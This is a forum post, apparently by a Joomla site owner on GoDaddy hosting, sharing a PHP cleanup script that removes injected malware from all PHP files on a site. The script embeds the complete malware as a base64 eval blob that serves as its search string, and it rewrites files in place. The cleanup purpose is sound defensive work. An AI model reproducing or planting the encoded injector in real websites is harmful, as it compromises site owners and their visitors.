qab

Yes I agree petercasier, It is not a vulnerability in wordpress,joomla or drupal, its a vulnerability in godaddy itself as a host, this is very disappointing I must say.

this is the script I developed and used with success,
its kind of tricky, you need to do a couple of things before using the script

run this command in the SSH: find . -name “*.php” -type f -print?

that will display all PHP files in your directory including subdirectories

if you dont know how to execute it just use a cron job it should email it to you with no problem,

now you save it in a txt file named “php.txt”

upload php.txt with anything.php, anything.php contains the following:
(please change what i ask you to change)
the script isint perfect but should do the job ,

only use this as a last resort, backup your website before use as well. just incase

<?php
  $files = file_get_contents('php.txt');

  $afiles= explode("\n", $files);

   for($i=0;$i<count($afiles);$i++){ //you mite want to lessen the loops if your website is big
    qabandi($afiles[$i]);
   }

 function qabandi($file){
$sick = "{rest of location}".trim($file);//this is where you add the rest of location
$content = file_get_contents($sick);
$handle = fopen($sick, "w+");

$clean = str_replace(bad(), "", $content);

fwrite($handle,$clean);
fclose($handle);
echo($sick."[cleaned]\n");

}

 function bad(){ return base64_decode("PD9waHAgLyoqLyBldmFsKGJhc2U2NF9kZWNvZGUoImFXWW9ablZ1WTNScGIyNWZaWGhwYzNSektD
ZHZZbDl6ZEdGeWRDY3BKaVloYVhOelpYUW9KRWRNVDBKQlRGTmJKMjF5WDI1dkoxMHBLWHNnSUNB
a1IweFBRa0ZNVTFzbmJYSmZibThuWFQweE95QWdJR2xtS0NGbWRXNWpkR2x2Ymw5bGVHbHpkSE1v
SjIxeWIySm9KeWtwZXlBZ0lDQWdJR2xtS0NGbWRXNWpkR2x2Ymw5bGVHbHpkSE1vSjJkdGJDY3BL
WHNnSUNBZ0lHWjFibU4wYVc5dUlHZHRiQ2dwZXlBZ0lDQWdJR2xtSUNnaGMzUnlhWE4wY2lna1gx
TkZVbFpGVWxzaVNGUlVVRjlWVTBWU1gwRkhSVTVVSWwwc0ltZHZiMmRzWldKdmRDSXBKaVlnS0NG
emRISnBjM1J5S0NSZlUwVlNWa1ZTV3lKSVZGUlFYMVZUUlZKZlFVZEZUbFFpWFN3aWVXRm9iMjhp
S1NrcGV5QWdJQ0FnSUNCeVpYUjFjbTRnWW1GelpUWTBYMlJsWTI5a1pTZ2lVRWhPYW1OdGJIZGtR
MEo2WTIxTk9VbHRhREJrU0VFMlRIazVjbHBIY0hKYWJYQjZZVEpTYldGdGVIcGhNbEp4V21rMWFt
SXlNSFpoTTBGMVkwZG9kMGxxTkRoTU0wNXFZMjFzZDJSRU5EMGlLVHNnSUNBZ0lDQjlJQ0FnSUNB
Z2NtVjBkWEp1SUNJaU95QWdJQ0FnZlNBZ0lDQjlJQ0FnSUNBZ0lDQnBaaWdoWm5WdVkzUnBiMjVm
WlhocGMzUnpLQ2RuZW1SbFkyOWtaU2NwS1hzZ0lDQWdJR1oxYm1OMGFXOXVJR2Q2WkdWamIyUmxL
Q1JTTlVFNVEwWXhRalE1TnpVd01rRkRRVEl6UXpoR05qRXhRVFUyTkRZNE5FTXBleUFnSUNBZ0lD
UlNNekJDTWtGQ09FUkRNVFE1TmtRd05rSXlNekJCTnpGRU9EazJNa0ZHTlVROVFHOXlaQ2hBYzNW
aWMzUnlLQ1JTTlVFNVEwWXhRalE1TnpVd01rRkRRVEl6UXpoR05qRXhRVFUyTkRZNE5FTXNNeXd4
S1NrN0lDQWdJQ0FnSkZKQ1JUUkRORVF3TXpkRk9UTTVNakkyUmpZMU9ERXlPRGcxUVRVelJFRkVP
VDB4TURzZ0lDQWdJQ0FrVWtFelJEVXlSVFV5UVRRNE9UTTJRMFJGTUVZMU16VTJRa0l3T0RZMU1r
WXlQVEE3SUNBZ0lDQWdhV1lvSkZJek1FSXlRVUk0UkVNeE5EazJSREEyUWpJek1FRTNNVVE0T1RZ
eVFVWTFSQ1kwS1hzZ0lDQWdJQ0FnSkZJMk0wSkZSRVUyUWpFNU1qWTJSRFJGUmtWQlJEQTNRVFJF
T1RGRk1qbEZRajFBZFc1d1lXTnJLQ2QySnl4emRXSnpkSElvSkZJMVFUbERSakZDTkRrM05UQXlR
VU5CTWpORE9FWTJNVEZCTlRZME5qZzBReXd4TUN3eUtTazdJQ0FnSUNBZ0lDUlNOak5DUlVSRk5r
SXhPVEkyTmtRMFJVWkZRVVF3TjBFMFJEa3hSVEk1UlVJOUpGSTJNMEpGUkVVMlFqRTVNalkyUkRS
RlJrVkJSREEzUVRSRU9URkZNamxGUWxzeFhUc2dJQ0FnSUNBZ0pGSkNSVFJETkVRd016ZEZPVE01
TWpJMlJqWTFPREV5T0RnMVFUVXpSRUZFT1NzOU1pc2tVall6UWtWRVJUWkNNVGt5TmpaRU5FVkdS
VUZFTURkQk5FUTVNVVV5T1VWQ095QWdJQ0FnSUgwZ0lDQWdJQ0JwWmlna1VqTXdRakpCUWpoRVF6
RTBPVFpFTURaQ01qTXdRVGN4UkRnNU5qSkJSalZFSmpncGV5QWdJQ0FnSUNBa1VrSkZORU0wUkRB
ek4wVTVNemt5TWpaR05qVTRNVEk0T0RWQk5UTkVRVVE1UFVCemRISndiM01vSkZJMVFUbERSakZD
TkRrM05UQXlRVU5CTWpORE9FWTJNVEZCTlRZME5qZzBReXhqYUhJb01Da3NKRkpDUlRSRE5FUXdN
emRGT1RNNU1qSTJSalkxT0RFeU9EZzFRVFV6UkVGRU9Ta3JNVHNnSUNBZ0lDQjlJQ0FnSUNBZ2FX
WW9KRkl6TUVJeVFVSTRSRU14TkRrMlJEQTJRakl6TUVFM01VUTRPVFl5UVVZMVJDWXhOaWw3SUNB
Z0lDQWdJQ1JTUWtVMFF6UkVNRE0zUlRrek9USXlOa1kyTlRneE1qZzROVUUxTTBSQlJEazlRSE4w
Y25CdmN5Z2tValZCT1VOR01VSTBPVGMxTURKQlEwRXlNME00UmpZeE1VRTFOalEyT0RSRExHTm9j
aWd3S1N3a1VrSkZORU0wUkRBek4wVTVNemt5TWpaR05qVTRNVEk0T0RWQk5UTkVRVVE1S1NzeE95
QWdJQ0FnSUgwZ0lDQWdJQ0JwWmlna1VqTXdRakpCUWpoRVF6RTBPVFpFTURaQ01qTXdRVGN4UkRn
NU5qSkJSalZFSmpJcGV5QWdJQ0FnSUNBa1VrSkZORU0wUkRBek4wVTVNemt5TWpaR05qVTRNVEk0
T0RWQk5UTkVRVVE1S3oweU95QWdJQ0FnSUgwZ0lDQWdJQ0FrVWpBek5FRkZNa0ZDT1RSR09UbERR
emd4UWpNNE9VRXhPREl5UkVFek16VXpQVUJuZW1sdVpteGhkR1VvUUhOMVluTjBjaWdrVWpWQk9V
TkdNVUkwT1RjMU1ESkJRMEV5TTBNNFJqWXhNVUUxTmpRMk9EUkRMQ1JTUWtVMFF6UkVNRE0zUlRr
ek9USXlOa1kyTlRneE1qZzROVUUxTTBSQlJEa3BLVHNnSUNBZ0lDQnBaaWdrVWpBek5FRkZNa0ZD
T1RSR09UbERRemd4UWpNNE9VRXhPREl5UkVFek16VXpQVDA5UmtGTVUwVXBleUFnSUNBZ0lDQWtV
akF6TkVGRk1rRkNPVFJHT1RsRFF6Z3hRak00T1VFeE9ESXlSRUV6TXpVelBTUlNOVUU1UTBZeFFq
UTVOelV3TWtGRFFUSXpRemhHTmpFeFFUVTJORFk0TkVNN0lDQWdJQ0FnZlNBZ0lDQWdJSEpsZEhW
eWJpQWtVakF6TkVGRk1rRkNPVFJHT1RsRFF6Z3hRak00T1VFeE9ESXlSRUV6TXpVek95QWdJQ0Fn
ZlNBZ0lDQjlJQ0FnSUdaMWJtTjBhVzl1SUcxeWIySm9LQ1JTUlRneVJVVTVRakV5TVVZM01EazRP
VFZGUmpVMFJVSkJOMFpCTmtJM09FSXBleUFnSUNBZ1NHVmhaR1Z5S0NkRGIyNTBaVzUwTFVWdVky
OWthVzVuT2lCdWIyNWxKeWs3SUNBZ0lDQWtVa0V4TnpsQlFrUXpRVGRDT1VVeU9FTXpOamxHTjBJ
MU9VTTFNVUk0TVVSRlBXZDZaR1ZqYjJSbEtDUlNSVGd5UlVVNVFqRXlNVVkzTURrNE9UVkZSalUw
UlVKQk4wWkJOa0kzT0VJcE95QWdJQ0FnSUNCcFppaHdjbVZuWDIxaGRHTm9LQ2N2WER4Y0wySnZa
SGt2YzJrbkxDUlNRVEUzT1VGQ1JETkJOMEk1UlRJNFF6TTJPVVkzUWpVNVF6VXhRamd4UkVVcEtY
c2dJQ0FnSUNCeVpYUjFjbTRnY0hKbFoxOXlaWEJzWVdObEtDY3ZLRnc4WEM5aWIyUjVXMTVjUGww
cVhENHBMM05wSnl4bmJXd29LUzRpWEc0aUxpY2tNU2NzSkZKQk1UYzVRVUpFTTBFM1FqbEZNamhE
TXpZNVJqZENOVGxETlRGQ09ERkVSU2s3SUNBZ0lDQjlaV3h6WlhzZ0lDQWdJQ0J5WlhSMWNtNGdK
RkpCTVRjNVFVSkVNMEUzUWpsRk1qaERNelk1UmpkQ05UbEROVEZDT0RGRVJTNW5iV3dvS1RzZ0lD
QWdJSDBnSUNBZ2ZTQWdJQ0J2WWw5emRHRnlkQ2duYlhKdlltZ25LVHNnSUNCOUlDQjkiKSk7Pz4=");}function good(){return base64_decode("PD9QSFAgLyphbC1xYWJhbmRpQGhvdG1haWwuY29tKi8gPz4=");}

?>

ok the solution go daddy is giving respectfully is useless,

my website has joomla installed and is hosted in a godaddy server, I’m proud to say I have completely removed the virus using my own scripting skills, all it took was 10 mins. the virus is hardly that, its just code that somehow bypassed godaddy’s security and was able to write itself to all php files.